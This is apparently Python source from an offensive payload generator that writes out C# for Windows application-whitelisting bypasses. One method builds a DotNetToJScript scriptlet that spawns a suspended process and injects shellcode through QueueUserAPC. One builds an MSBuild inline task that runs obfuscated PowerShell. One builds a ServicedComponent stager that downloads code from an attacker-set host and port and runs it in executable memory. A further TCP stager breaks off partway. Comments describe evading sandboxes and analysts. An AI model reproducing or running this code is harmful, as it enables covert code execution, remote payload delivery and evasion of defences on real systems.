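    script_type = self.required_options["SCRIPT_TYPE"][0].lower()
    if script_type == "jscript":
        stub_name = "migrate.js"
        out_name = "greatsct.js"
        lang_args = []
    elif script_type == "vbscript":
        stub_name = "migrate.vbs"
        out_name = "greatsct.vbs"
        lang_args = ["-l", "vbscript"]
    else:
        raise ValueError("Script type not supported: %r"
                         % (self.required_options["SCRIPT_TYPE"][0],))

    # Name of the script-side variable that carries the base64 shellcode.
    x86 = bypass_helpers.randomString()

    # figure out a sane way to generate two separate instances of shellcode within the framework
    # currently, only 32 bit payload shellcode will work (mcs -platform:x86 below)
    payload_code, num_tabs_required = gamemaker.senecas_games(self)
    # NOTE(review): num_tabs_required (braces left open by the sandbox-check
    # prologue) is not used to emit closing braces here, unlike the other
    # generators; confirm the prologue compiles when checks are enabled.

    indent = "\t"  # one level inside the class body
    bytearrayName = bypass_helpers.randomString()
    # These two must match the "-c HelloWorld" argument and the "o.Print"
    # stub handed to DotNetToJScript below.
    className = "HelloWorld"
    processMigrate = "Print"
    processMigratex86 = bypass_helpers.randomString()
    processMigrateProcessPath = bypass_helpers.randomString()
    processMigrateShellcode = bypass_helpers.randomString()
    shellCode = bypass_helpers.randomString()
    startupInfo = bypass_helpers.randomString()
    processInformation = bypass_helpers.randomString()
    success = bypass_helpers.randomString()
    resultPtr = bypass_helpers.randomString()
    bytesWritten = bypass_helpers.randomString()
    resultBool = bypass_helpers.randomString()
    oldProtect = bypass_helpers.randomString()
    targetProc = bypass_helpers.randomString()
    currentThreads = bypass_helpers.randomString()
    sht = bypass_helpers.randomString()
    ptr = bypass_helpers.randomString()
    ThreadHandle = bypass_helpers.randomString()

    code = "using System;\nusing System.Diagnostics;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Linq;\n\n"
    code += "[ComVisible(true)]\n"
    code += "public class {0}\n".format(className)
    code += "{\n"
    code += indent + "public {0}()\n".format(className)
    code += indent + "{\n\n"
    code += indent + "}\n\n"
    code += indent + "public void {0}(string {1})\n".format(processMigrate, processMigratex86)
    code += indent + "{\n"
    code += indent + payload_code
    code += indent + "string {0};\n".format(processMigrateShellcode)
    code += indent + "string {0};\n".format(processMigrateProcessPath)
    code += indent + "\t{0} = {1};\n".format(processMigrateShellcode, processMigratex86)
    # NOTE(review): PROCESS is spliced into a C# string literal verbatim; a
    # value containing a double quote or backslash breaks the generated code.
    code += indent + "\t{0} = \"{1}\";\n\n".format(
        processMigrateProcessPath,
        "C:\\\\Windows\\\\System32\\\\" + self.required_options["PROCESS"][0])
    code += indent + "\tstring %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(%s));\n" % (bytearrayName, processMigrateShellcode)
    code += indent + "\tstring[] chars = %s.Split(',').ToArray();\n" % (bytearrayName)
    code += indent + "\tbyte[] %s = new byte[chars.Length];\n" % (shellCode)
    code += indent + "\tfor (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % (shellCode)
    # Spawn the host suspended and windowless, write the shellcode RW, then
    # flip it to RX; no RWX region is ever created in the target.
    code += indent + "\tSTARTUPINFO {0} = new STARTUPINFO();\n".format(startupInfo)
    code += indent + "\tPROCESS_INFORMATION {0} = new PROCESS_INFORMATION();\n".format(processInformation)
    code += indent + "\tbool {0} = CreateProcess({1}, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED | ProcessCreationFlags.CREATE_NO_WINDOW , IntPtr.Zero, null, ref {2}, out {3});\n".format(
        success, processMigrateProcessPath, startupInfo, processInformation)
    code += indent + "\tif (!{0}) return;\n".format(success)
    code += indent + "\tIntPtr {0} = VirtualAllocEx({1}.hProcess, IntPtr.Zero, {2}.Length, MEM_COMMIT, PAGE_READWRITE);\n".format(
        resultPtr, processInformation, shellCode)
    code += indent + "\tif ({0} == IntPtr.Zero) return;\n".format(resultPtr)
    code += indent + "\tIntPtr {0} = IntPtr.Zero;\n".format(bytesWritten)
    code += indent + "\tbool {0} = WriteProcessMemory({1}.hProcess,{2},{3},{4}.Length, out {5});\n".format(
        resultBool, processInformation, resultPtr, shellCode, shellCode, bytesWritten)
    code += indent + "\tuint {0} = 0;\n".format(oldProtect)
    code += indent + "\t{0} = VirtualProtectEx({1}.hProcess, {2}, {3}.Length, PAGE_EXECUTE_READ, out {4} );\n".format(
        resultBool, processInformation, resultPtr, shellCode, oldProtect)
    # Re-open the primary thread by id with SET_CONTEXT rights (what
    # QueueUserAPC needs), queue the shellcode as an APC, then resume: the
    # APC runs as the still-initialising thread resumes.
    code += indent + "\tProcess {0} = Process.GetProcessById((int){1}.dwProcessId);\n".format(targetProc, processInformation)
    code += indent + "\tProcessThreadCollection {0} = {1}.Threads;\n".format(currentThreads, targetProc)
    code += indent + "\tIntPtr {0} = OpenThread(ThreadAccess.SET_CONTEXT, false, {1}[0].Id);\n".format(sht, currentThreads)
    code += indent + "\tIntPtr {0} = QueueUserAPC({1},{2},IntPtr.Zero);\n".format(ptr, resultPtr, sht)
    code += indent + "\tIntPtr {0} = {1}.hThread;\n".format(ThreadHandle, processInformation)
    code += indent + "\tResumeThread({0});\n".format(ThreadHandle)
    code += indent + "}\n"
    # Win32 constants, structs and P/Invoke signatures.  CREATE_SEPARATE_WOW_VDM
    # is 0x00000800 (the old value duplicated CREATE_SHARED_WOW_VDM).
    code += """
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_EXECUTE_READ = 0x20;
    private static UInt32 PAGE_READWRITE = 0x04;

    [Flags]
    public enum ProcessAccessFlags : uint
    {
        All = 0x001F0FFF,
        Terminate = 0x00000001,
        CreateThread = 0x00000002,
        VirtualMemoryOperation = 0x00000008,
        VirtualMemoryRead = 0x00000010,
        VirtualMemoryWrite = 0x00000020,
        DuplicateHandle = 0x00000040,
        CreateProcess = 0x000000080,
        SetQuota = 0x00000100,
        SetInformation = 0x00000200,
        QueryInformation = 0x00000400,
        QueryLimitedInformation = 0x00001000,
        Synchronize = 0x00100000
    }

    [Flags]
    public enum ProcessCreationFlags : uint
    {
        ZERO_FLAG = 0x00000000,
        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
        CREATE_NEW_CONSOLE = 0x00000010,
        CREATE_NEW_PROCESS_GROUP = 0x00000200,
        CREATE_NO_WINDOW = 0x08000000,
        CREATE_PROTECTED_PROCESS = 0x00040000,
        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
        CREATE_SEPARATE_WOW_VDM = 0x00000800,
        CREATE_SHARED_WOW_VDM = 0x00001000,
        CREATE_SUSPENDED = 0x00000004,
        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
        DEBUG_PROCESS = 0x00000001,
        DETACHED_PROCESS = 0x00000008,
        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
        INHERIT_PARENT_AFFINITY = 0x00010000
    }

    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
    }

    public struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [Flags]
    public enum ThreadAccess : int
    {
        TERMINATE = (0x0001),
        SUSPEND_RESUME = (0x0002),
        GET_CONTEXT = (0x0008),
        SET_CONTEXT = (0x0010),
        SET_INFORMATION = (0x0020),
        QUERY_INFORMATION = (0x0040),
        SET_THREAD_TOKEN = (0x0080),
        IMPERSONATE = (0x0100),
        DIRECT_IMPERSONATION = (0x0200)
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId);
    [DllImport("kernel32.dll",SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
    [DllImport("kernel32.dll")]
    public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
    [DllImport("kernel32.dll", SetLastError = true )]
    public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
    [DllImport("kernel32.dll")]
    static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
    [DllImport("kernel32.dll")]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    [DllImport("kernel32.dll")]
    public static extern uint ResumeThread(IntPtr hThread);
    [DllImport("kernel32.dll")]
    public static extern uint SuspendThread(IntPtr hThread);
}
"""

    # Script stub DotNetToJScript embeds: call HelloWorld.Print(<b64 var>).
    if script_type == "jscript":
        stub = "o.Print({0});".format(x86)
        wrapper_head = "<scriptlet>\n<registration progid=\"helloworld\">\n<script language=\"JScript\">\nvar {0} = \"{1}\";\n\n".format(x86, Shellcode)
    else:
        stub = "o.Print {0}".format(x86)
        wrapper_head = "<scriptlet>\n<registration progid=\"helloworld\">\n<script language=\"VBScript\">\nDim {0} : {0} = \"{1}\"\n\n".format(x86, Shellcode)

    # Compile and convert inside a private temp dir (removed on exit); the
    # tool paths and WINEPREFIX are kept as the install layout expects them.
    with tempfile.TemporaryDirectory(prefix="greatsct-") as workdir:
        cs_path = os.path.join(workdir, "hta_source.cs")
        dll_path = os.path.join(workdir, "dotnettojscript.dll")
        stub_path = os.path.join(workdir, stub_name)
        out_path = os.path.join(workdir, out_name)
        with open(cs_path, "w") as f:
            f.write(code)
        with open(stub_path, "w") as ff:
            ff.write(stub)
        subprocess.run(
            ["mcs", "-platform:x86", "-target:library", "-sdk:2", cs_path,
             "-out:" + dll_path],
            check=True)
        env = dict(os.environ, WINEPREFIX="/root/.greatsct")
        subprocess.run(
            ["wine", "/usr/share/greatsct/DotNetToJScript.exe", dll_path,
             "-ver", "auto"] + lang_args +
            ["-c", className, "-o", out_path, "-s", stub_path],
            env=env, check=True)
        with open(out_path, "r") as converted:
            data = converted.read()

    self.payload_source_code = (
        wrapper_head + data + "\n</script>\n</registration>\n</scriptlet>")
    return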
def generate(self):
    """Build an MSBuild project file whose inline C# task runs a PowerShell script.

    Reads the script at ``required_options["SCRIPT"]``, optionally appends
    ``required_options["FUNCTION"]`` and passes the text through
    ``invoke_obfuscation``, base64-embeds the result in a CodeTaskFactory
    task and stores the finished XML in ``self.payload_source_code``.
    Returns None; the caller reads the attribute.
    """
    # Parse "KEY=value" pairs handed over on the command line (-c) into
    # required_options.  An item containing neither "," nor " " is not
    # split, so `options` keeps whatever the previous iteration produced.
    options = []
    for option in self.cli_opts.c:
        if "," in option:
            options = option.split(",")
        if " " in option:
            options = option.split(" ")
        for o in options:
            for i in self.required_options:
                if i in o:
                    # NOTE(review): str.strip removes a *set* of characters from
                    # both ends, not the "KEY=" prefix, so a value whose first or
                    # last character occurs in KEY (or is "=") gets clipped.
                    self.required_options[i][0] = o.strip("{0}=".format(i))
    # randomize all our variable names, yo'
    targetName = bypass_helpers.randomString()
    namespaceName = bypass_helpers.randomString()
    className = bypass_helpers.randomString()
    FunctionName = bypass_helpers.randomString()
    num_tabs_required = 0
    # get 12 random variables for the API imports
    r = [bypass_helpers.randomString() for x in range(12)]
    y = [bypass_helpers.randomString() for x in range(17)]
    with open(self.required_options["SCRIPT"][0], "r") as f:
        the_script = f.read()
    # First encoding pass.  When FUNCTION is set it is appended to the
    # script before encoding and then reset to "x" so it is not emitted
    # separately in the header below.
    if self.required_options["OBFUSCATION"][0].lower() != "x":
        if self.required_options["FUNCTION"][0] != "x":
            # Append FUNCTION to end of script
            the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
            if self.required_options["OBFUSCATION"][0].lower() == "binary":
                the_script = invoke_obfuscation.binaryEncode(the_script)
            elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            self.required_options["FUNCTION"][0] = "x"
        else:
            if self.required_options["OBFUSCATION"][0].lower() == "binary":
                the_script = invoke_obfuscation.binaryEncode(the_script)
            elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            self.required_options["FUNCTION"][0] = "x"
    # NOTE(review): the FUNCTION value is substituted into the XML
    # PropertyGroup verbatim; characters such as "<", "&" or '"' would
    # break the project file.  The value is operator-supplied.
    if self.required_options["FUNCTION"][0].lower() != "x":
        # The header for MSBuild XML files
        # TODO: Fix the awful formatting
        # Set FUNCTION to None if using Invoke-Obfuscation
        msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t <PropertyGroup> <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName> </PropertyGroup> <Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Reference Include="System.Management.Automation" /> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className, self.required_options["FUNCTION"][0])
    else:
        # The header for MSBuild XML files
        # TODO: Fix the awful formatting
        # Set FUNCTION to None if using Invoke-Obfuscation
        msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n\t <PropertyGroup> <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName> </PropertyGroup> <Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Reference Include="System.Management.Automation" /> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className, "None")
    # NOTE(review): this appears to encode the script a second time when
    # OBFUSCATION is set, on top of the pass above -- confirm whether that
    # double encoding is intended or whether one of the two blocks is stale.
    if self.required_options["OBFUSCATION"][0].lower() != "x":
        if self.required_options["OBFUSCATION"][0].lower() == "binary":
            the_script = invoke_obfuscation.binaryEncode(the_script)
        elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
            the_script = invoke_obfuscation.asciiEncode(the_script)
    #required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
    payload_code += "public class %s : Task, ITask {\n" % (className)
    # "$(FunctionName)" is expanded by MSBuild from the PropertyGroup above.
    payload_code += "\npublic string {0} = \"$(FunctionName)\";".format(FunctionName)
    # senecas_games returns extra C# plus the number of braces it left open;
    # the while loop further down closes them.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    encodedScript = bypass_helpers.randomString()
    # NOTE(review): bytes(..., 'latin-1') raises UnicodeEncodeError for any
    # script character outside Latin-1 -- TODO confirm the intended encoding.
    encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii')
    powershellCmd = bypass_helpers.randomString()
    data = bypass_helpers.randomString()
    command = bypass_helpers.randomString()
    RunPSCommand = bypass_helpers.randomString()
    cmd = bypass_helpers.randomString()
    runspace = bypass_helpers.randomString()
    scriptInvoker = bypass_helpers.randomString()
    pipeline = bypass_helpers.randomString()
    results = bypass_helpers.randomString()
    stringBuilder = bypass_helpers.randomString()
    obj = bypass_helpers.randomString()
    RunPSFile = bypass_helpers.randomString()
    script = bypass_helpers.randomString()
    ps = bypass_helpers.randomString()
    e = bypass_helpers.randomString()
    # Body of the task's Execute(): decode the embedded script, append the
    # function name unless it is "None", and run it through a Runspace.
    payload_code += """string {0} = "{1}"; string {2} = ""; if ({3} != "None") {{ byte[] {4} = Convert.FromBase64String({0}); string {5} = Encoding.ASCII.GetString({4}); {2} = {5} + "" + {3}; }} else {{ byte[] {4} = Convert.FromBase64String({0}); string {5} = Encoding.ASCII.GetString({4}); {2} = {5}; }} try {{ Console.Write({6}({2})); }} catch (Exception {7}) {{ Console.Write({7}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, FunctionName, data, command, RunPSCommand, e)
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1
    # The C# "//" comment inside this literal must be followed by a line
    # break, otherwise it would comment out the method that follows it.
    payload_code += """return true; }} //Based on Jared Atkinson's And Justin Warner's Work
public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); {4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps)
    payload_code += "}\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
    payload_code = msbuild_header + payload_code
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build C# source for a ServicedComponent that fetches a stage over HTTP.

    The emitted class (System.EnterpriseServices) runs its payload from the
    [ComRegisterFunction]/[ComUnregisterFunction] hooks, downloads bytes from
    ``http://LHOST:LPORT/<uri>`` and hands them to an inject routine chosen by
    ``required_options["INJECT_METHOD"]`` ("virtual" or "heap").  The finished
    source is stored in ``self.payload_source_code``; returns None.
    """
    # randomize all our variable names, yo'
    classhellcodeName = bypass_helpers.randomString()
    classhellcodeNameTwo = bypass_helpers.randomString()
    namespace = bypass_helpers.randomString()
    key = bypass_helpers.randomString()
    injectName = bypass_helpers.randomString()
    execName = bypass_helpers.randomString()
    bytearrayName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    savedStateName = bypass_helpers.randomString()
    shellcodeName = bypass_helpers.randomString()
    rand_bool = bypass_helpers.randomString()
    random_out = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    num_tabs_required = 0
    # get random variables for the API imports
    r = [bypass_helpers.randomString() for x in range(16)]
    y = [bypass_helpers.randomString() for x in range(17)]
    #required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n"
    payload_code += "namespace {0}\n {{".format(namespace)
    payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(classhellcodeName)
    # placeholder for legitimate C# program
    # lets add a message box to throw offf sandbox heuristics and analysts :)
    payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(classhellcodeName)
    # Both COM (un)registration hooks call the same static entry point.
    payload_code += "\n\t\t[ComRegisterFunction]"
    payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(classhellcodeNameTwo, execName)
    payload_code += "\n[ComUnregisterFunction]"
    payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classhellcodeNameTwo, execName)
    payload_code += "\n\tpublic class {0}\n\t{{".format(classhellcodeNameTwo)
    # P/Invoke declarations; parameter names are randomised from r / y.
    # No declarations are emitted for any other INJECT_METHOD value, and the
    # inject routine below is then missing too.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])
    # code for the randomString() function
    randomStringName = bypass_helpers.randomString()
    bufferName = bypass_helpers.randomString()
    charshellcodeName = bypass_helpers.randomString()
    # random.shuffle is the stdlib PRNG; it only varies the alphabet order
    # baked into the C# and is not used for anything security-sensitive.
    t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
    random.shuffle(t)
    chars = ''.join(t)
    # code for the randomString() method
    payload_code += "static string %s(Random r, int s) {\n" % (randomStringName)
    payload_code += "char[] %s = new char[s];\n" % (bufferName)
    payload_code += "string %s = \"%s\";\n" % (charshellcodeName, chars)
    payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (bufferName, charshellcodeName, charshellcodeName)
    payload_code += "return new string(%s);}\n" % (bufferName)
    # code for the checksum8() function
    # True when the sum of the string's char codes mod 0x100 equals 92.
    checksum8Name = bypass_helpers.randomString()
    payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (checksum8Name)
    # code for the genHTTPChecksum() function
    # Searches (up to 64 x alphabet tries) for a 4-char URI passing checksum8
    # and falls back to the literal "9vXU" otherwise.
    genHTTPChecksumName = bypass_helpers.randomString()
    baseStringName = bypass_helpers.randomString()
    randCharshellcodeName = bypass_helpers.randomString()
    urlName = bypass_helpers.randomString()
    random.shuffle(t)
    randChars = ''.join(t)
    payload_code += "static string %s(Random r) { string %s = \"\";\n" % (genHTTPChecksumName, baseStringName)
    payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (baseStringName, randomStringName)
    payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (randCharshellcodeName, randChars)
    payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (randCharshellcodeName)
    payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharshellcodeName)
    payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (checksum8Name, urlName, urlName)
    # code for getData() function
    # WebClient download with a fixed, dated User-Agent string (a stable
    # network indicator).  Responses shorter than 100000 bytes are discarded.
    getDataName = bypass_helpers.randomString()
    strName = bypass_helpers.randomString()
    webClientName = bypass_helpers.randomString()
    payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName)
    payload_code += "WebClient %s = new System.Net.WebClient();\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (webClientName)
    payload_code += "byte[] %s = null;\n" % (shellcodeName)
    payload_code += "try { %s = %s.DownloadData(%s);\n" % (shellcodeName, webClientName, strName)
    payload_code += "if (%s.Length < 100000) return null;}\n" % (shellcodeName)
    # Network errors are swallowed; the caller then sees null.
    payload_code += "catch (WebException) {}\n"
    payload_code += "return %s;}\n" % (shellcodeName)
    # Inject routine.  "virtual": VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    # + CreateThread.  "heap": HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) +
    # HeapAlloc(HEAP_ZERO_MEMORY) + RtlMoveMemory + CreateThread.  Both wait
    # on the thread indefinitely (0xFFFFFFFF == INFINITE).
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName)
        payload_code += " if (%s != null) {\n" % (shellcodeName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName)
        payload_code += " if (%s != null) {\n" % (shellcodeName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, shellcodeName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, shellcodeName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, shellcodeName, shellcodeName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
    randomName = bypass_helpers.randomString()
    num_tabs_required = 0
    # Static entry point called from the COM hooks above.
    payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
    # senecas_games returns extra C# plus the number of braces it left open;
    # 3 more are added for namespace/class/method and all are closed below.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 3
    payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (randomName)
    # LHOST/LPORT are interpolated verbatim into the C# string literal.
    payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (shellcodeName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
    payload_code += "%s(%s);\n" % (injectName, shellcodeName)
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1
    self.payload_source_code = payload_code
    return
<doc_update>
def generate(self):
    """Build C# source for a ServicedComponent that fetches a stage over raw TCP.

    Same layout as the HTTP variant: the [ComRegisterFunction]/
    [ComUnregisterFunction] hooks call a static entry point which connects to
    ``LHOST:LPORT``, reads a 4-byte little-endian length followed by that many
    bytes, and hands the buffer to the inject routine chosen by
    ``required_options["INJECT_METHOD"]``.  The finished source is stored in
    ``self.payload_source_code``; returns None.
    """
    # randomize all our variable names, yo'
    classhellcodeName = bypass_helpers.randomString()
    classhellcodeNameTwo = bypass_helpers.randomString()
    namespace = bypass_helpers.randomString()
    key = bypass_helpers.randomString()
    injectName = bypass_helpers.randomString()
    execName = bypass_helpers.randomString()
    bytearrayName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    savedStateName = bypass_helpers.randomString()
    shellcodeName = bypass_helpers.randomString()
    rand_bool = bypass_helpers.randomString()
    random_out = bypass_helpers.randomString()
    # NOTE(review): `helpers` is used here and for the socket variable names
    # below, while the rest of this method uses `bypass_helpers`.  If `helpers`
    # is not imported by this module this raises NameError -- confirm.
    getDataName = helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    num_tabs_required = 0
    # get random variables for the API imports
    r = [bypass_helpers.randomString() for x in range(16)]
    y = [bypass_helpers.randomString() for x in range(17)]
